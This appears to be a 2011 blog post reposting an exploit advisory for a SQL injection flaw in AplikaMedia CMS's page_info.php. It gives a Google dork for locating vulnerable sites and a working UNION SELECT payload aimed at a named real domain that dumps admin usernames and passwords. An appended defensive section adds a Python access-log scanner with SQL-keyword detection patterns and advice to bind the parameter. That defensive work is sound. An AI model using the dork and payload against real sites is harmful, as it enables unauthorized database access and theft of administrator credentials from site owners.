Wednesday, 16 March 2011

AplikaMedia CMS SQL Injection

[~] Google Dork : inurl:page_info.php?id_brt=
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                   [Exploit]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[+]Exploit:

http://www.dyna-h2o.com/page_info.php?id_brt=[Sql_injection]
 
[+]Example:

http://www.dyna-h2o.com/page_info.php?id_brt=43%20and%201=2%20union%
20select%200,1,2,3,4,0x483358205761732048657265202520536570656872205365
637572697479205465616d,6,group_concat%28username,0x3a,password%29,8,9,10,11,
12,13,14,15%20from%20useradmin--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[*]Greetz:thE_Knight - Einestin - Wizard - Naboodgar 
   C0NS74NTINE & all Sepehr Security Teams members
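
Added example for defenders (not part of the original advisory and not AplikaMedia code): a log check that flags requests to page_info.php whose id_brt value is not a plain integer, which is the shape of the request shown above. The log lines are constructed, and the rule that a legitimate id_brt is a short decimal integer is an assumption based on the 43 in the example URL.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; client IPs are documentation placeholders.
SAMPLE_LOG = [
    '198.51.100.7 - - [16/Mar/2011:10:00:01 +0700] "GET /page_info.php?id_brt=43 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [16/Mar/2011:10:00:05 +0700] "GET /page_info.php?id_brt=43%20and%201=2%20union%20select%200,1,2%20from%20useradmin-- HTTP/1.1" 200 6144',
    '198.51.100.9 - - [16/Mar/2011:10:00:09 +0700] "GET /page_info.php?id_brt=43%27 HTTP/1.1" 500 312',
    '198.51.100.3 - - [16/Mar/2011:10:00:12 +0700] "GET /index.php?id_brt=abc HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Tokens that have no place in a numeric id; taken from the shape of the example URL.
SQL_TOKENS = re.compile(r"\b(?:union|select|from|group_concat)\b|--|/\*|\b0x[0-9a-f]+", re.I)
# Assumption: a legitimate id_brt is a short decimal integer, like the 43 in the example.
VALID_ID = re.compile(r"[0-9]{1,10}")


def classify(line):
    """Return a finding dict for a suspicious page_info.php request, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith("/page_info.php"):
        return None
    # parse_qs percent-decodes, so %20union%20select is inspected as plain text.
    for value in parse_qs(url.query, keep_blank_values=True).get("id_brt", []):
        if VALID_ID.fullmatch(value):
            continue
        verdict = "sql-keywords" if SQL_TOKENS.search(value) else "non-integer"
        return {"client": line.split()[0], "value": value, "verdict": verdict}
    return None


def scan(lines):
    """Classify every line and keep only the findings."""
    return [finding for finding in map(classify, lines) if finding]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["verdict"], finding["client"], repr(finding["value"]))
```

Log detection is a backstop; the fix in the application is to validate id_brt as an integer and bind it as a query parameter instead of concatenating it into the SQL string.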
 